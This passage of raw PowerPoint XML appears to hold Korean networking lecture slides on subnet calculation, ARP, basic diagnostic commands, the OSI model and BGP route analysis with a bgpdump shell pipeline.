            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>192.12.100.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Subnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Mask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>A) Net Address : 192.12.100.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: 256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>개</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>Q) Net Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>를 구하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>최대 수용 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" err="1"/>
              <a:t>구하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>192.12.100.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Subnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Mask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>255.255.255.192</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>A) Net Address : 192.12.100.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>개</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>네트워크에 있는 분들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>혹시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22.87.132.42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>님 계시나요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>같은 네트워크에 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>들에게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ARP Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>BroadCast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>BroadCast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>해당 공간 모두에게 외치는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>네</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>제가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22.87.132.42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>물리 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04-B3-BC-18-9A-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 그때그때 물리적 주소를 물어보지 말고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>적어놓자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>ARP Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host2, 04-B3-BC-18-9A-11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>추가</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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a:t>동적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: ARP reply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 의 해 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>정적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사용자가 정한 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99970195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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> 8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>tracert 8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 계층</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OSI 7 계층 (OSI 7 Layer) 과 TCP/IP 4 계층 (TCP/IP 4 Layer) :: 재리랜드">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCE76B2-FA72-4958-B0A0-6A6715CE7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569" y="2019943"/>
            <a:ext cx="5084253" cy="36976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A8C56D-5E35-48E2-A716-28C9A8D1E1AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828799" y="6045212"/>
            <a:ext cx="8061821" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu Condensed"/>
              </a:rPr>
              <a:t>통신이 일어나는 과정이 단계별로 파악 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ubuntu Condensed"/>
              </a:rPr>
              <a:t>-&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Condensed"/>
              </a:rPr>
              <a:t>기능분리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Condensed"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Condensed"/>
              </a:rPr>
              <a:t>통신 이상의 원인 구별</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Condensed"/>
              </a:rPr>
              <a:t>! )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19159653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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>소니피쳐스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>소니피쳐스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>https://bgp.he.net</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> BGP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 프로토콜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838200" y="5600475"/>
            <a:ext cx="10184934" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>목적지 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>다른 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>AS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>까지 거쳐야하는 경로의 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Apple SD Gothic Neo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>도달 가능성 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>(Network Reachability) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>을 확인하고 알리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>프로토콜</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="인터넷/라우팅 프로토콜 (RIP/OSPF/BGP)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD6B59F-4A2A-49A0-B552-3F6A1D72EE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697" y="1955035"/>
            <a:ext cx="6358856" cy="3154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6736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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>소니피쳐스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://archive.routeviews.org/bgpdata/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>
              <a:t>=`bgpdump -m $f</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>| grep 131279</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>| awk -F "|" '{print $3}'</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>| sort</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>| uniq -c</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>&gt;&gt;../result.csv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>| sed 'N;s/\n/ /'`</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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BGP log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>download</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Plan/Circles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>문화부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계획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정보보호반</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="12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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>2~3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>주차 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>~</a:t>
                      </a:r>
